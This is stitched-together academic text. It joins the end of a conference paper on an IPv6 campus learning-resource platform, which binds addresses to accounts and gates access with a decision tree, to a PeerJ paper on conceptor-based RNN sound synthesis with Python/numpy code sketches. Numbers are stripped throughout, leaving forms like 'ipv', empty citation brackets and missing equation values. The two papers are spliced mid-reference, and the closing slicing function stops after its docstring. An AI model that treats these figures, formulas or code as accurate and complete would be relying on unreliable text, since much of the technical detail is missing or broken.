at present, the most widely used technology is dual station technology. in this paper, ipv [ ][ ] itself is inherently safe, the address is unique, the address is wide and the transmission speed is fast. in the pure ipv environment, it is proposed to develop the campus learning resource sharing platform based on ipv , which can realize the upload of various learning resources download, in order to achieve the real learning resources to share, as a common progress, learn from each other, to discuss each other, so as to improve the quality of teaching, improve teaching effectiveness. ii. the overall design of learning resource sharing platform a. overall design the learning resource sharing platform is divided into two modules: client and server, as shown in figure . figure . overall design international conference on sensor network and computer engineering (icsnce ) the learning resource sharing platform[ ] is divided into two types of users: learners and administrators, learners upload and download and browse learning resources, communicating with each other through the message board; administrators of learning materials and message content audit, management[ ]. the general function of the system for the user is to upload learning materials and the corresponding description of the data, after the review by other users can download the use of the user after the use of the data can be evaluated, feedback to the platform of the message board. all users who have registered in this platform can upload and download student resources. before uploading, you need to verify the ipv address and user identity. the uploaded resources need to be audited before being downloaded. resources need to be feedback and evaluation after downloading resources. the development of the above platform is and the use of pure ipv environment is carried out. b. detailed design ) user management a) user registration and login users can register through the registration web page on the platform to become a user member of the platform. in this case, the user's ip address should be obtained and bound with its account. after success of the registration, the user can login through the login web page on the platform. after logging in, you can upload, download, play online and message and other operations. unregistered or unregistered users can browse the resources on this platform, but they can’t do the above operations. they can only use it before logging in. b) account management users can use the personal information web page to view the current user's registration information. in the meanwhile, we can update the user's property or modify the password through the web page. of course, for the user who forget the password, they can log in the web page to find the password to jump to modify the page to modify. when the login account is different form the last login ipv address, we can determine whether the new ipv the address is the same to the old. if it is, we allowed to continue to log in; if not in the same network account, prompts him to answer questions, the answer is correct, allowing it to continue to visit; otherwise, continue to answer questions, three times to prevent access to this law to prevent non-i upload illegal information, or to prevent non-i am injected into the illegal operation of virus files to protect the safety of users and resources. c. resource management the platform is a resource sharing platform which needs to cover all aspects of teaching resources. 
the platform in accordance with the discipline of resources classification, and real-time update resources. the main functions of it are: upload, download, online, message and so on. ) resource upload and download users can upload the various forms of resources, whose types are not limited. for example, you can upload word documents, ppt courseware, flash animation and video resources. the suffix of the resource can be. doc, .ppt, .zip, .rar, .swf and .tif and so on. only the resource information of the resource file is stored in the database. the website provides the resource download service according to the resource path. the uploaded resource file is usually stored in a subdirectory under the root directory of the website. users can only release resources after log in. users can fill out the information of the resource name, detailed information and other information. when users publish resources to determine whether the user's ipv address and the registration of the ipv address in the same network, if the same network, the user can upload data, if not in the same network, you need to answer specific questions to ensure the safety and reliability of users and resources. users can download the various forms of resources on the platform, each resource below the corresponding download. after the user clicks the download button, the download box will pop up, the path will be selected to click to start the download, and the user can select the default download path. after the completion of access to the appropriate path to view resources. ) resources online browsing users can browse some of the resources in the system, that is, you can browse the resources online without downloading. users simply click on the play button below the resource, you can browse online. for users who do not have the button to play, the user can only download and browse. ) message module the user can comment on a resource, they can also reply to the resources of other users to ask questions, in order to achieve the purpose of interactive learning; users can delete their own message, the administrator can delete the message, the message can not be edited. d. administrator management administrators can view, upload, download, delete resources, they can set the upload resource size limit, for the user to upload the resources for review, pending approval before the resource can be used. at the same time the administrator can also view, send and delete messages. of course, as with the user to upload resources, the administrator login after the implementation of administrative authority before the need for ipv authentication to determine the administrator's ipv address and the registration of the ipv address is the same network segment. if they are in same network segment, the management administrator can perform administrative privileges, and if it is no longer in the same network segment, the administrator needs to answer specific questions to perform administrative privileges. thus ensuring that the administrator himself is in operation to prevent others from maliciously executing administrator privileges. to ensure the safety of system operation. international conference on sensor network and computer engineering (icsnce ) iii. security measures for learning resource sharing platform of ipv a. the characteristics of ipv ensure the safety of network resources because ipv is just a simple network interworking protocol, a large number of security issues are not considered in, and ipv achieves ip-level security. 
ipsec is a series of security protocols that define the security services used at the internet layer. features of it includes data encryption, access control to network elements, data source address verification, data integrity checking, and replay prevention.ipv includes ipsec protocol, which can protect users from some network attacks[ ]. b. a huge resource of ipv addresses makes it possible to determine the one-to-one relationship between users and addresses since an ipv address is bits, theoretically there are ^ different ipv addresses. so basically it is guaranteed that everyone has a unique ipv address. this guarantees a true one-to-one correspondence between the user and the ip address. ipv does not support subnet masks. it only supports subnet prefix identification. the ipv prefix uses an address prefix similar to the cidr mechanism in ipv addresses. ipv uses address prefixes to identify networks, subnets, and routes. the ipv address is divided into two parts: the subnet prefix and the interface identifier [ ]. c. ipv address and user information binding one-to-one relationship between users and addresses ensure each user has a unique ipv address. this makes it possible to bind ip addresses to user information. the purpose of binding user information and user ip address is when you login next time, we can determine whether the same person in operation. if the user login address is same as the last ip address, then at least we can ensure the user or authorized others are operating. if it is not my own operations, then we can confirm whether it is himself by asking questions, if the answer is incorrect, only allow users to browse, but not allow other upload or download or leave a message and other operations. thus the system ensure the security of user information, but also protect the network resources and management of the security. d. application of decision tree algorithm in security assurance when the user register, we will get the user's ipv address and bind the user's information to their ipv address. when the user login again, we first determine whether the user's ipv address and the ipv address bound to it are in a campus network. if the user is in the same campus network, we use method . the user can directly upload data, download resources, learn online, message interaction and other operations. if not in the same campus network to determine whether in a city. if they are in a city, then we use the method , the user needs to enter the verification code, the verification code is correct, continue to use method .if they are not in a city , we determine whether it is the national address, if it is from other domestic cities ipv address, then we use the method , the user answered specific questions, if the problem is correct he can continue to access, we use method , or only have the right to browse or directly denied access to this site. this to ensure the safety of users, the safety of learning resources and management of the safety and reliability, this to ensure the safety of the entire learning resources platform. we analyzed ipv address in the experiment and divided into four categories in table below, and four kinds of ipv addresses for different treatment. in this process, if the ipv address is wrong ,the website will direct denial of access after prompt error. in general, there will not be wrong ipv address, ipv address in the ipv library are automatically obtained by the system. table i. 
four types of ipv address and the corresponding processing method:
whether campus website | whether city website | whether other chinese cities | whether foreign website | processing method
yes | no | no | no | method
no | yes | no | no | method
no | no | yes | no | method
no | no | no | yes | method
therefore, we first classified the ipv address based on the address library. of course, for each user the ipv library does not only hold the address recorded at the first application: each time the user logs in, statistics for these four categories are accumulated, and the data in the ipv library is updated to the most frequently used ipv address. based on the classification process, a decision tree [ ] is used to make the classification decision.
[figure . processing decision tree.]
iv. conclusion. the resources provided by the website include images, text, video and other types, and the content is not limited to the school curriculum knowledge. rich and comprehensive learning resources provide students with class and extracurricular learning opportunities. the realization in ipv greatly improves the security of the site, its users and its resources. the speed of access and download makes it unnecessary to wait too long. the binding of ipv addresses to user information makes uploaded resources reliable, ensuring the security of the user, the security of the learning resources and the security and reliability of the management, thus ensuring the safety of the entire learning resource platform. the resources of the learning resource sharing platform and the reliability of its users and information determine the utilization of the platform; it is a major supplement to school teaching, improving the quality of teaching and teaching results. acknowledgment. thanks for the funding support from the project: the next generation of internet innovation projects in the seir network, fund number: ng. references [ ] zhu shuang. september north america ipv address exhausted [j]. china education network, ( ): - . [ ] sun zhongting. nat technology to solve the problem of ip address shortage [j]. computer and network. ( ): - . [ ] wang ning. vlsm technology in the application of ip address management [j]. computer cd-rom software and applications. : - . [ ] li ruijun. cidr-based network ip address planning and application [j]. journal of changchun normal university (natural science edition). ( ): - . [ ] xia feng. research and implementation of key technology of distance education system based on ipv [j]. journal of xi'an jiaotong university, . [ ] guo-liang han, cong-xiao bao, xing li. a scalable and efficient ipv address integration approach in ipv transition scenarios [j]. frontiers of information technology & electronic engineering. august , volume , issue , pp - . [ ] wu zhaoxiong, liang xiongxiong. using the gre tunneling technology to access the meteorological local area network method [j]. guangdong meteorology. ( ): - . [ ] cheng si, cheng jia-xing. research on tunneling technology in vpn [j]. computer technology & development. ( ): - . [ ] gao zheng-ming, zhao yong, bao wei-hua. technology and realization of profibus dp / pa network protocol [j]. instrumentation standardization and metrology. : . [ ] li changhua, cui chenzhou, etc.
ipv technology in astronomy research cloud computing environment application [j]. journal of computer applications. , (s ): - . [ ] ge jingguo, mi wei, wu yulei.ipv transition mechanism: research review, evaluation index and deployment considerations [j] .journal of software . : - . [ ] huang zhang-shu, li bao-yu, chen cui-ping. design of customer knowledge sharing resource library platform based on cloud computing [j]. modern information . . . ( ): - . [ ] zhang tao. ipv a number of security issues [d]. chinese academy of sciences graduate school (institute of software), . [ ] liu haifeng, wang lixin. implementation of ipv video on demand system based on think php framework [j]. journal of jilin institute of engineering technology, , ( ): - . [ ] qing hui. ipv -based multicast technology and application system research [d]. wuhan university of technology, . [ ] zhou dangdang, su yong. television ratings prediction research based on decision tree. submitted november accepted june published july corresponding author chris kiefer, c.kiefer@sussex.ac.uk academic editor dan stowell additional information and declarations can be found on page doi . /peerj-cs. copyright kiefer distributed under creative commons cc-by . open access sample-level sound synthesis with recurrent neural networks and conceptors chris kiefer experimental music technologies lab, department of music, university of sussex, brighton, united kingdom abstract conceptors are a recent development in the field of reservoir computing; they can be used to influence the dynamics of recurrent neural networks (rnns), enabling generation of arbitrary patterns based on training data. conceptors allow interpolation and extrapolation between patterns, and also provide a system of boolean logic for combining patterns together. generation and manipulation of arbitrary patterns using conceptors has significant potential as a sound synthesis method for applications in computer music but has yet to be explored. conceptors are untested with the generation of multi-timbre audio patterns, and little testing has been done on scalability to longer patterns required for audio. a novel method of sound synthesis based on conceptors is introduced. conceptular synthesis is based on granular synthesis; sets of conceptors are trained to recall varying patterns from a single rnn, then a runtime mechanism switches between them, generating short patterns which are recombined into a longer sound. the quality of sound resynthesis using this technique is experimentally evaluated. conceptor models are shown to resynthesise audio with a comparable quality to a close equivalent technique using echo state networks with stored patterns and output feedback. conceptor models are also shown to excel in their malleability and potential for creative sound manipulation, in comparison to echo state network models which tend to fail when the same manipulations are applied. examples are given demonstrating creative sonic possibilities, by exploiting conceptor pattern morphing, boolean conceptor logic and manipulation of rnn dynamics. limitations of conceptor models are revealed with regards to reproduction quality, and pragmatic limitations are also shown, where rises in computation and memory requirements preclude the use of these models for training with longer sound samples. 
the techniques presented here represent an initial exploration of the sound synthesis potential of conceptors, demonstrating possible creative applications in sound design; future possibilities and research questions are outlined. subjects artificial intelligence, multimedia keywords sound synthesis, machine learning, reservoir computing, conceptors, dynamical systems, echo state networks introduction machine learning and sound synthesis current intersections between sound synthesis and machine learning are evolving quickly. we have seen significant progress in symbolic note generation (e.g., rl tuner how to cite this article kiefer c. . sample-level sound synthesis with recurrent neural networks and conceptors. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com mailto:c.kiefer@sussex.ac.uk https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. (jaques et al., ), flow machines (ghedini, pachet & roy, )), parametric control of sound synthesis models (e.g wekinator (fiebrink, ), automatic vst programming (yee-king, fedden & d’inverno, )) and also with current state of the art raw audio generation techniques. these recent advances in raw audio synthesis principally use deep architectures, for example wavenet (oord et al., ), samplernn (mehri et al., ), nsynth (engel et al., ), gansynth (engel et al., ) and wavegan (donahue, mcauley & puckette, ), to generate low-level audio representations (sample or spectral level) without using a synthesis engine, working as self-contained models that merge sound generation and control into one. there is also significant interest from the computer music community in sound synthesis with dynamical and chaotic systems, with strong connections to rnn techniques being used in contemporary deep architectures. this goes back to the earlier work of composers such as roland kayn who composed with electronic cybernetic systems, and is reflected in more recent work from, for example, sanfilippo & valle ( ) on feedback systems, ianigro & bown ( ) on sound synthesis with continuous-time recurrent neural networks, wyse ( ) on sound synthesis with rnns and mudd ( ) on nonlinear dynamical processes in musical tools. the work presented here draws on overlapping research in both machine learning and dynamical systems techniques, in the context of sound synthesis. reservoir computing while many contemporary developments in machine learning and sound synthesis are based on deep neural network paradigms, pioneering work has also been taking place within the bio-inspired field of reservoir computing (rc) (schrauwen, verstraeten & van campenhout, ). within the rc paradigm, computation is performed using a structure that groups an untrained reservoir with a fixed input layer and a trainable output layer. the reservoir is a complex dynamical system which is perturbed by input signals and transforms these signals into a high-dimensional state space, the current state being dependent on both the current input and on a fading history of previous inputs. the output layer performs a linear transformation of the current reservoir state, and can be trained using supervised methods. rc systems can learn nonlinear and temporal mappings between the input and output signals. 
a reservoir can be created using both physical systems (e.g bacteria (jones et al., ), a bucket of water (fernando & sojakka, ) or optics (duport et al., )) and digital systems. the latter usually take the form of liquid-state machines (maass, natschläger & markram, ) or echo state networks (esns) (jaeger, ). echo state networks esns have so far been the primary technique employed for sound and music applications within the rc field. an esn (see fig. ) uses a randomly generated recurrent neural network (rnn) as a reservoir. this reservoir is connected to inputs and output via single layers of weights. the output layer weights can be trained using linear optimisation algorithms such as ridge regression (lukoševičius, , p. ). esns are inherently suited to audio applications due to their temporal dynamics. jaeger’s original work with esns included examples of models being trained to output kiefer ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure an example of an echo state network with ten sparsely connected nodes, single inputs and outputs, and fully connected input and output layers. full-size doi: . /peerjcs. /fig- discrete-periodic sequences and learning to behave as sine wave oscillators (jaeger, ). subsequently, esns have been applied to a range of creative sound and music tasks. these include symbolic sound generation tasks such as melody generation (jaeger & eck, ) and generative human-feel drumming (tidemann & demiris, ); direct audio manipulation and synthesis applications bear examples of amplifier modelling, audio prediction and polyphonic transcription (holzmann, b; holzmann, a; keuninckx, danckaert & van der sande, ); they have also been used for modelling complex mappings in interactive music systems (kiefer, ). under the classical esn approach, as applied to the task of sound synthesis, esns are trained as audio rate pattern generators. a limitation of the classical esn approach is that it is challenging to learn multiple attractors, corresponding to the generation of multiple patterns on different timescales with a single reservoir, although holzmann ( a) offered a solution by decoupling the reservoir with iir filter neurons. a recent development of the esn paradigm comes in the form of conceptors, an addition to the basic architecture of esns that enables the behaviour of the reservoir to be manipulated. conceptors conceptors (jaeger, a), offer a highly flexible method for generating and manipulating multiple patterns within single reservoirs. conceptors are a mechanism for performing a variety of neuro-computational functions, the ones most relevant to sound synthesis being incremental learning and generation of patterns, morphing and extrapolation of patterns, cued pattern recall, and the use of boolean logic to combine patterns (jaeger, a). they work by learning the subset of state space visited by an rnn when driven by a particular input. they can then be used to restrict the rnn to operate with this subspace, functioning like an attractor (gast et al., ). the separation of an rnn’s state space in this manner allows multiple attractors to be learned using the same network, and for combinations of these subspaces to be used to manipulate the dynamics and output of the rnn. the potential for combination of conceptors is a very powerful feature of this technique, and jaeger describes boolean logic rules for achieving this (jaeger, b p. ). 
their strong potential for pattern generation, extrapolation and manipulation, and the combination of continuous and discrete-boolean methods of manipulation are compelling kiefer ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. reasons to believe they will have strong applications in the field of audio and creative sound production. sound generation with conceptors has, however, yet to be explored. jaeger’s original work focuses on generation of short patterns of samples of less, where much longer patterns are required for sound generation. questions are unanswered concerning whether conceptors will (a) effectively generate longer patterns needed to synthesise audio signals at reasonable sample rates, (b) allow generation and combination of patterns with varied timbres within a single model and (c) produce signals effectively when evaluated with perceptually realistic audio comparison measurements. this paper approaches these questions through the application of conceptor models to a standard sound synthesis technique. it evaluates the effectiveness of conceptors at resynthesising sampled sound, and demonstrates conceptor-based sound synthesis techniques within a granular synthesis paradigm. new sound synthesis methods a new method of conceptor-based sound synthesis is demonstrated, named conceptular synthesis. this is a synthesis method based on granular synthesis. granular synthesis (roads, ) is based on the sequencing, combination and manipulation of short (typically ms– ms) windowed segments (grains) of sampled sound. it is a powerful technique for creating and coherently manipulating sound; applications include time and pitch independent stretching of pre-recorded audio. in conceptular synthesis, an rnn model is trained to generate grains, which are recalled by conceptors. the use of conceptor based rnn models allows flexible sound manipulation through creative combinations of conceptors to influence reservoir behaviour. this method is described below; to begin with, a mathematical description of the rnn and conceptor models is presented. basic models this section summarises the fundamental methods used in the creation of the sound synthesis models described below. for a more detailed explanation of these methods, please refer to jaeger’s extensive technical report on conceptors (jaeger, b). the notation used below will be used throughout the paper. matrices are represented by capital letters, vectors by lower-case letters, and scalar variables are shown using the greek alphabet. x(n) denotes the state of vector x at timestep n.m ′ denotes the transposition of matrix m. the basic model is an rnn consisting of ψ nodes, updated according to eqs. ( )–( ): z(n+ )=wx(n)+w ina(n+ ) ( ) at discrete time step n, activation levels for each rnn node are stored in state vector x of size ψ. the nodes are sparsely connected such that each node is connected, on average, to other nodes (as recommended in lukoševičius ( , section . . ). connection weight values are stored in weight matrix w (of size ψ x ψ). unconnected nodes share a weight value of . an input signal vector a (size ) is fully connected to the rnn nodes with the input weight matrix w in (size ψ x ). w in is generated using linear random values between −γ input and γ input . reservoir weight values are randomly chosen from a normal distribution, scaled according to the spectral radius γw (to limit the maximum kiefer ( ), peerj comput. sci., doi . /peerj-cs. 
absolute eigenvalue), and then optimised during training. in eq. ( ), the activation levels for each node are stored in vector z; in eq. ( ) these activation values are passed through a nonlinearity, and smoothed using leaky integration. x(n+1) = (1 − α) x(n) + α tanh(z(n+1) + b) ( ) b is a vector of ψ biases, which are generated from a linear random distribution between −γ_bias and γ_bias. scaling in the above cases refers to a tensor being multiplied element-wise by a scalar value, x′ = xγ. the tanh smoothing function ensures that the reservoir states remain in the range −1 to 1, and introduces a nonlinearity into each node. α is a leaky integration coefficient (lukoševičius, , section . . ). this adds a one-pole lowpass filter to each node; lowering α (between 0 and 1) will slow down reservoir dynamics. this parameter can be fine-tuned to align the temporal dynamics of the reservoir to those of the desired output. y(n+1) = W_out x(n+1) ( ) output weights W_out are a matrix of size 1 × ψ, whose values are optimised during training. the output vector y is a vector of size 1. a model is trained in two phases: (a) audio signals a^j are stored (jaeger, a) in the reservoir, so that they can later be reproduced; (b) a conceptor is calculated for each audio signal. following training, the model and conceptors are combined and manipulated to synthesise sound. storing patterns in the rnn and calculating output weights. in this phase of training, a set of randomly generated reservoir weights W∗ are adapted so that the model can reproduce an array of driving audio signals a^j, resulting in a new set of weights W. W∗ is optimised such that (a) W x(n) ≈ W∗ x(n) + W_in a(n), i.e., the reservoir can simulate the driving inputs in their absence, and (b) the magnitudes of the weights W are minimised. the resulting weight matrix W is used in all further calculations. W_in is no longer required after this step. training starts with a washout phase of length λ where the reservoir dynamics are allowed to settle, reducing influence from any transients that might result from the initial randomised state and that may adversely affect training. the model is subsequently driven by an input for length φ. the size of φ is task dependent, but should be large enough to collect the reservoir states that are likely to occur when perturbed by the input sequence. φ is calculated as an integer multiple of the length of training signal a^j. the training process works as follows: for each pattern a^j, the reservoir with weights W∗ is driven from an initial randomised state for λ + φ steps using eqs. ( ) and ( ), and the resultant reservoir states are collected. the states x from timesteps λ−1 ... λ+φ−2 are stored in a ψ × φ matrix X̃^j; states x from timesteps λ ... λ+φ−1 are stored in a ψ × φ matrix X^j; states z from timesteps λ ... λ+φ−1 are stored in a ψ × φ matrix M^j. the remaining states from the washout phase are discarded. the driving signals a^j from timesteps λ ... λ+φ−1 are stored in 1 × φ matrices P^j. these collections are concatenated into matrices X̃ = [X̃^1 | X̃^2 | ... | X̃^N], X = [X^1 | X^2 | ... | X^N], M = [M^1 | M^2 | ... | M^N] and P = [P^1 | P^2 | ... | P^N]. W and W_out can now be calculated using linear regression.
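as an illustration of the harvesting procedure just described, the following numpy sketch drives the reservoir with each training pattern and assembles the matrices X̃, X, M and P used in the regressions below. it is a non-authoritative outline under simplifying assumptions (the harvesting length φ is taken as one pattern period, the washout is at least one step, and variable names are illustrative), not the published implementation.

```python
import numpy as np

def harvest_states(W_star, W_in, b, alpha, patterns, washout):
    """drive the reservoir with each training pattern and collect the state
    matrices X_tilde, X, M and P described above. W_in and b are 1-d arrays of
    length psi, alpha is the leak coefficient, patterns is a list of 1-d audio
    arrays; assumes washout >= 1. illustrative sketch only."""
    Xt_all, X_all, M_all, P_all = [], [], [], []
    psi = W_star.shape[0]
    for a in patterns:
        phi = len(a)
        xs = [np.random.uniform(-1.0, 1.0, psi)]   # x(0): random initial state
        zs = [np.zeros(psi)]                       # placeholder for z(0), never harvested
        us = [0.0]                                 # placeholder for the input at step 0
        for n in range(washout + phi):             # simulate timesteps 1 .. washout+phi
            u = a[n % phi]                         # pattern repeats while harvesting
            z = W_star @ xs[-1] + W_in * u
            x = (1.0 - alpha) * xs[-1] + alpha * np.tanh(z + b)
            zs.append(z)
            xs.append(x)
            us.append(u)
        xs, zs, us = np.array(xs), np.array(zs), np.array(us)
        Xt_all.append(xs[washout - 1:washout + phi - 1].T)       # x(lambda-1 .. lambda+phi-2)
        X_all.append(xs[washout:washout + phi].T)                # x(lambda .. lambda+phi-1)
        M_all.append(zs[washout:washout + phi].T)                # z(lambda .. lambda+phi-1)
        P_all.append(us[washout:washout + phi].reshape(1, phi))  # driving signal, same span
    # concatenate the per-pattern collections for the regressions that follow
    return (np.hstack(Xt_all), np.hstack(X_all), np.hstack(M_all), np.hstack(P_all))
```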
the regression could be solved using a number of techniques; in this case, following jaeger's initial work on conceptors (jaeger, b), ridge regression is used: W = ((X̃ X̃′ + ρ_W I_{ψ×ψ})^{−1} X̃ M′)′ ( ) W_out = ((X X′ + ρ_out I_{ψ×ψ})^{−1} X P′)′ ( ) in both of the above, I is an identity matrix and ρ_W and ρ_out are regularisation factors. calculating conceptors. conceptors can take several forms; the form used in this study is the alloconceptor (jaeger, , p ), a matrix conceptor that is calculated after patterns are stored in the network, and inserted into the update loop of the network at runtime. to calculate a conceptor which will influence the rnn to reproduce audio signal a^j, the reservoir state correlation matrix R^j is initially calculated: R^j = X^j (X^j)′ / φ ( ) the singular value decomposition (svd) of R^j is found: U^j S^j (U^j)′ = R^j ( ) S^j is modified as follows, and used to calculate the conceptor C^j: S_new = S^j (S^j + β^{−2} I_{ψ×ψ})^{−1} ( ) C^j = U^j S_new (U^j)′ ( ) β is the aperture of the conceptor (jaeger, b, p ). the aperture is a scaling factor for the amount of energy that is allowed to pass when the conceptor filters the reservoir state in eq. ( ). the optimal value for β can be found programmatically (see below). the new conceptor can now be inserted into the runtime loop of the rnn, as follows: z(n+1) = W x(n) ( ) this is a modification of eq. ( ), with the audio signal input removed, as it is no longer needed. z(n+1) is then passed through the leaky integration filter from eq. ( ), and the result is multiplied by the conceptor, as follows: x∗(n+1) = (1 − α) x(n) + α tanh(z(n+1) + b) ( ) x(n+1) = C^j x∗(n+1) ( ) following this step, eq. ( ) is used to calculate the output signal. an optimal value for β can be found by observing the attenuation a_{C,β}, which is the level of reservoir signal energy suppressed by the conceptor when the network is updated using eqs. ( ) and ( ) (jaeger, b, p ). attenuation can be calculated as follows: a_{C,β} = E[||z(n) − x(n)||²] / E[||z(n)||²] ( ) the optimal value for β corresponds to the minimum value of attenuation, calculated by collecting states from the model using conceptors calculated with varying values of β. the result of this training process is an rnn coupled with a set of conceptors; this model is referred to as a conceptor-controlled recurrent neural network (ccrnn). these basic methods are used in the experiments below, and expanded on with new techniques that allow training and exploitation of the models for sound synthesis.
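the training and runtime procedures summarised in this section can be sketched compactly as follows, assuming the state matrices gathered by the harvesting sketch above. this is an illustrative numpy outline rather than the author's released code; the aperture is applied as β^(−2), following the conceptor equation above.

```python
import numpy as np

def ridge(A, B, rho):
    """ridge regression solving W A ≈ B: W = ((A A' + rho I)^-1 A B')',
    mirroring the two regression equations above."""
    return np.linalg.solve(A @ A.T + rho * np.eye(A.shape[0]), A @ B.T).T

def load_patterns(X_tilde, X, M, P, rho_w, rho_out):
    """compute the new reservoir weights W and the readout weights W_out."""
    W = ridge(X_tilde, M, rho_w)       # reservoir learns to simulate its driving input
    W_out = ridge(X, P, rho_out)       # readout maps reservoir states to audio samples
    return W, W_out

def conceptor(Xj, beta):
    """alloconceptor for one pattern, from that pattern's harvested states Xj."""
    R = Xj @ Xj.T / Xj.shape[1]                  # reservoir state correlation matrix
    U, s, _ = np.linalg.svd(R)
    s_new = s / (s + beta ** -2)                 # aperture-adapted singular values
    return (U * s_new) @ U.T                     # U diag(s_new) U'

def generate(W, W_out, b, alpha, C, x0, n_samples):
    """run the conceptor-constrained network autonomously and read out audio."""
    x = x0.copy()
    y = np.zeros(n_samples)
    for n in range(n_samples):
        z = W @ x                                # input term removed at runtime
        x = C @ ((1.0 - alpha) * x + alpha * np.tanh(z + b))
        y[n] = float(W_out @ x)
    return y, x
```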
method and materials

this project asks how the pattern generation ability of ccrnns can be applied to the field of sound synthesis. it aims to establish and evaluate the fundamental capabilities of ccrnns to be trained to reproduce arbitrary audio signals, and to explore their creative affordances. the next section evaluates the potential of ccrnns to resynthesise sampled sounds. the ability of trained models to resynthesise the training signal is used as a measure of basic success in sound synthesis. resynthesis ability is the core indication of sound synthesis quality, although this evaluation only tells part of the story, as the techniques outlined in this project are intended for open-ended use in creative sound synthesis applications. to this end, the project maps out key methods for parameterising and manipulating ccrnn sound synthesis models to create new sonic variations of the original training material, establishes the technical strengths and limitations of ccrnn sound synthesis, and identifies open questions for future research in this area. there is some discussion of processing time, to indicate the scale of computation involved with these techniques. the conceptular synthesis experiment was run on a machine with a . ghz i cpu and an nvidia gtx ti gpu, using tensorflow. python source code in jupyter notebooks for all experiments is provided at https://github.com/chriskiefer/conceptorsoundsynthesis. source code for a working implementation of conceptular synthesis in the form of a drum synthesiser can be found at https://github.com/chriskiefer/conceptularbeatsynth.

error and similarity metrics

the experiments in this project focus on the quality of audio signals resynthesised with trained models in comparison to the original training material. in the wider reservoir computing literature, normalised root-mean-square error (nrmse) is commonly used to measure similarity between signals. nrmse does not reflect perceptual aspects of sound similarity; these are crucial to understanding the results, so a different metric is required. mel-frequency cepstral coefficients (mfccs) have been shown to be a robust measure of timbral similarity (jensen et al., ) and a good model of perceptual timbre space (pampalk, dixon & widmer, ). they are widely used for music information retrieval tasks (hamel & eck, ) across a variety of use cases (e.g., yee-king, fedden & d'inverno, ; khunarsal, lursinsap & raicharoen, ). for the purpose of audio signal comparison, mfccs were calculated from a windowed fft. the sounds being analysed were short (typically between and samples); in order to capture the detail of the timbral envelope at all stages, a short hop size was used. the fft results from each window were used to calculate mfccs. the first mfcc coefficient from each window was discarded, as it does not give information about timbre (jensen et al., ). the remaining coefficients from each window were appended to create a single feature vector. the feature vectors from two sounds were compared using nrmse to arrive at an error value that reflects the similarity between the two sounds. this will be referred to as the mfcc error, with lower values indicating higher similarity. where relevant, waveforms and spectrograms are displayed for visual comparison, and audio is included in the dataset accompanying this paper.
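as an illustration of the mfcc error described above, the following sketch computes it with librosa. the paper does not name the mfcc implementation it used, and the fft size, hop size, number of coefficients and the exact nrmse normalisation are elided in this copy, so the values below (and the normalisation by the range of the reference features) are stand-ins.

```python
import numpy as np
import librosa

def mfcc_features(y, sr, n_fft=1024, hop_length=32, n_mfcc=13):
    m = librosa.feature.mfcc(y=y, sr=sr, n_mfcc=n_mfcc,
                             n_fft=n_fft, hop_length=hop_length)
    return m[1:].flatten()            # discard the first coefficient, append the rest

def nrmse(reference, estimate):
    n = min(len(reference), len(estimate))
    r, e = reference[:n], estimate[:n]
    rmse = np.sqrt(np.mean((r - e) ** 2))
    return rmse / (r.max() - r.min() + 1e-12)

def mfcc_error(original, resynthesis, sr):
    # lower values indicate higher timbral similarity
    return nrmse(mfcc_features(original, sr), mfcc_features(resynthesis, sr))
```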
conceptular synthesis

conceptular synthesis is a new sound synthesis method based on ccrnns, expanding on an established method of sound synthesis, granular synthesis. in granular synthesis, sound is broken into small parts (grains), which are recombined in varying ways to produce new sounds. the theoretical roots of this method lie in gabor's ( ) theory of acoustic quanta and in the compositional theory of xenakis ( ). digital implementations of the technique were developed by roads ( ) and truax ( ). granular synthesis offers methods for further sound manipulation techniques, including timestretching (truax, ) and corpus-based concatenative synthesis (schwarz, ).

jaeger's demonstration of the ability of ccrnns to be trained to generate arbitrary sequences suggests that they could become powerful sound synthesis tools, as they can theoretically reproduce arbitrary audio waveforms. however, they are pragmatically limited to playing relatively short sequences; the reason for this is that the computational complexity of the model increases with ψ, and the desired size of ψ increases with the length of the training sequences. if, however, a model is trained to reproduce a set of shorter sound sequences, then granular synthesis techniques can be used to recombine these sequences to produce longer sounds. conceptular synthesis therefore expands upon granular synthesis by dynamically generating grains using conceptors, rather than replaying grains from sound sample data. grain patterns are stored in an rnn, and conceptors force the rnn to replay specific grains. a granular synthesis-style control mechanism is used to switch conceptors so that the model generates a sequence of short signals, which are combined into a longer waveform. the use of dynamic models instead of static sample data broadens the sonic potential of conceptular synthesis in comparison to classical granular synthesis, as the models provide further possibilities for creative manipulation. this section begins by describing conceptular synthesis techniques in detail, illustrated by an example demonstrating resynthesis of a kick drum sample. resynthesis quality is then explored in an experiment comparing conceptular synthesis to a baseline method using feedback-induced oscillation. following this, extended sound synthesis options are described.

conceptular synthesis techniques

conceptular synthesis works by subdividing the audio training data into a set of sub-sequences, and learning an rnn and a set of conceptors that can regenerate these sub-sequences, with the intention of resynthesising the audio sample by recombining the model-generated sequences. the audio training data may be a single audio sample, or it may be composed of multiple audio samples to create a model that will create variation between different samples.

slicing training data

two methods of slicing the audio were explored: using constant or variable values for the sub-sequence size µ. using constant µ, the sample is divided into a set of equal-length signals a, of µ samples each. the optimal value of µ for a particular sound sample can be determined programmatically through a grid search. the constant-µ slicing method runs into problems, particularly when there are dominant frequencies in the source audio whose wavelength is longer than µ. slicing lower-frequency waveforms at non-zero points creates high-frequency artefacts in the training data, which can distort the training process, because these artefacts are not present in the original training material. for example, consider the kick drum waveform in fig. . the sample has low-frequency components with varying long wavelengths, and there is no constant value of µ that will avoid slicing at non-zero points. to avoid this, the sample can be analysed using a zero-crossing detector, resulting in a set of points i at which the sample is sliced to create a set of driving audio signals a:

i = {n | y(n) > 0 ∧ y(n+1) < 0}   ( )
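both slicing strategies are easy to express in a few lines. the sketch below is an illustrative reading of the description above; the handling of the segment before the first detected crossing is my choice and is not specified in the text.

```python
import numpy as np

def constant_slices(y, mu):
    """constant-µ slicing: divide the sample into equal-length signals."""
    return [y[i:i + mu] for i in range(0, len(y), mu)]

def zero_crossing_slices(y):
    """slice at positive-to-negative zero crossings, following the set
    definition i = {n | y(n) > 0 and y(n+1) < 0}."""
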